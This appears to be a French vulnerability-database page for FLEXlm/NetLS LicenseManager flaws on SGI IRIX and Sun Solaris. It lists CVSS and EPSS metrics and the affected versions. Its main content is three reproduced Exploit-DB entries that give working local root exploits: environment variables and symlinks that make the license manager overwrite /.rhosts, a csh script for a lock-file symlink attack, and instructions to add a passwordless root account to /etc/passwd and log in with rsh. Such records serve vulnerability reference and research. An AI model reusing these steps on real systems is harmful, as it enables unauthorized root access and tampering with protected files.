Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
7.2 |
|
AV:L/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 19066
Date de publication : 1996-04-04 22h00 +00:00
Auteur : Arthur Hagen
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/72/info
Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to
overwrite root-owned files allowing root access.
% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &
Install...
NetLS Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0
(in license version field put a space)
Apply
License(s) succesfully installed
% cat /.rhosts
#:# "whatever" "whatever" "1.000" "Incomplete"
+ +
If your system has remote root logins disabled, replacing /.rhosts with
/etc/passwd and + + with toor:0:0::/:/bin/sh.
Exploit Database EDB-ID : 19067
Date de publication : 1996-11-21 23h00 +00:00
Auteur : Yuri Volobuev
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/73/info
Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrary manipulate root-owned files allowing root access.
% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &
Next click on Update, fill in the four fields with any information and click
on Apply. LicenseManager will report an error. Ignore it and exit.
% cat /.rhosts
Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
% rsh localhost -l root
#
Exploit Database EDB-ID : 19350
Date de publication : 1998-10-20 22h00 +00:00
Auteur : Joel Eriksson
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/461/info
The Solaris License Manager that ships with versions 2.5.1 and 2.6 is vulnerable to multiple symlink attacks. License Manager creates lockfiles owned by root and set mode 666 which it writes to regularily. It follows symlinks.
bash$ ls -l /var/tmp/lock*
-rw-rw-rw- 1 root root 0 Oct 21 18:24 /var/tmp/lockESRI
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockISE-TCADd
-rw-rw-rw- 1 root root 0 Oct 21 14:29 /var/tmp/lockalta
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockansysd
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockasterxd
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockhpeesofd
-rw-rw-rw- 1 root root 0 Oct 21 18:46 /var/tmp/locksuntechd
And:
bash$ ls -l /var/tmp/.flexlm
total 2
-rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211
There are several lockfiles created by the License Manager. It is trivial to gain root access locally through exploitation of this vulnerability.
------
#!/bin/csh -f
# Change target user name before running
#
[email protected] 10/98
rm /tmp/locksuntechd
ln -s ~targetuser/.rhosts /tmp/locksuntechd
exit
------
then wait a min and cat + + >> ~targetuser/.rhosts
Products Mentioned
Configuraton 0
Globetrotter>>Flexlm >> Version 4.0
Globetrotter>>Flexlm >> Version 4.1
Globetrotter>>Flexlm >> Version 5.0
Sgi>>License_oeo >> Version 3.0
Sgi>>License_oeo >> Version 3.1
Sgi>>License_oeo >> Version 3.1.1
Sgi>>Irix >> Version 3.3.2
Sgi>>Irix >> Version 3.3.3
Sgi>>Irix >> Version 4.0
Sgi>>Irix >> Version 4.0.1
Sgi>>Irix >> Version 4.0.1t
Sgi>>Irix >> Version 4.0.2
Sgi>>Irix >> Version 4.0.3
Sgi>>Irix >> Version 4.0.4
Sgi>>Irix >> Version 4.0.4b
Sgi>>Irix >> Version 4.0.4t
Sgi>>Irix >> Version 4.0.5
Sgi>>Irix >> Version 4.0.5_iop
Sgi>>Irix >> Version 4.0.5_ipr
Sgi>>Irix >> Version 4.0.5a
Sgi>>Irix >> Version 4.0.5d
Sgi>>Irix >> Version 4.0.5e
Sgi>>Irix >> Version 4.0.5f
Sgi>>Irix >> Version 4.0.5g
Sgi>>Irix >> Version 4.0.5h
Sgi>>Irix >> Version 5.0
Sgi>>Irix >> Version 5.0.1
Sgi>>Irix >> Version 5.1
Sgi>>Irix >> Version 5.1.1
Sgi>>Irix >> Version 5.2
Sgi>>Irix >> Version 5.3
Sgi>>Irix >> Version 6.0
Sgi>>Irix >> Version 6.0.1
Sgi>>Irix >> Version 6.0.1
Sgi>>Irix >> Version 6.1
Sgi>>Irix >> Version 6.2
Sgi>>Irix >> Version 6.3
Sgi>>Irix >> Version 6.4
Configuraton 0
Sun>>Solaris >> Version 2.4
Sun>>Solaris >> Version 2.5
Sun>>Solaris >> Version 2.5.1
Sun>>Sunos >> Version 4.1.1
Sun>>Sunos >> Version 4.1.2
Sun>>Sunos >> Version 4.1.3
Sun>>Sunos >> Version 4.1.3u1
Sun>>Sunos >> Version 4.1.4
Sun>>Sunos >> Version 4.1.4jl
Sun>>Sunos >> Version 5.4
Sun>>Sunos >> Version 5.5
Sun>>Sunos >> Version 5.5.1
Références